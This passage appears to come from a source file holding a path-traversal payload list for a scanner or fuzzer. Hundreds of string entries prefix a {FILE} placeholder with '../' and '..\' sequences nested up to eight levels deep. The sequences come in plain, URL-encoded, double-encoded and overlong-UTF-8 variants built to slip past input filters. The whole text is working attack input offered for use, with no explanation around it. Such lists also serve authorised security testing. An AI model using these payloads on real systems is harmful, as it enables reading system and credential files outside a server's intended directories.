"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + 